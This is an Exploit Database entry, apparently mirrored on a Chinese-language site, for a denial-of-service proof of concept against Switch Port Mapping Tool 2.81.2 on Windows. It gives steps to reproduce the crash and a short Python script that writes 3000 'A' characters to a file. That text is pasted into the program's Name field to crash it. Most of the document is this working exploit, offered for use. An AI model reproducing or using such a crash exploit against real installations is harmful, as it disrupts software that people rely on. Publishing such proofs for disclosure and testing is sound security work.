Switch Port Mapping Tool 2.81.2 – ‘Name Field’ Denial of Service (PoC)

• Exploit Database
• 15 阅读

• 作者： Shubham Singh
  日期： 2018-08-13
• 类别：

  • dos
  平台：

  • windows_x86
• 来源：https://www.exploit-db.com/exploits/45191/

• # Exploit Title: Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)
  # Discovery by: Shubham Singh
  # Known As: Spirited Wolf [Twitter: @Pwsecspirit] 
  # Discovey Date: 2018-08-13
  # Vendor Homepage: https://switchportmapper.com/
  # Software Link: https://switchportmapper.com/download/spm2812.zip
  # Tested Version: 2.81.2
  # Tested on OS: Windows 7 Ultimate x86_64
  # Steps to Reproduce: 
  # Run the python exploit script, it will create a new file with the name
  # "exploit.txt". Just copy the text inside "exploit.txt" and start the 
  # Managed Switch Port Mapping Tool 2.81.2 program and click on "Enter Key".
  # In the 'Name field' paste the content of "exploit.txt" and click 
  # on "OK". You will see a crash.
  
  #!/usr/bin/env python
  
  file = open("exploit.txt","wb")
  junk = "A" * 3000
  exploit = junk
  buf = exploit
  file.write(buf)
  file.close()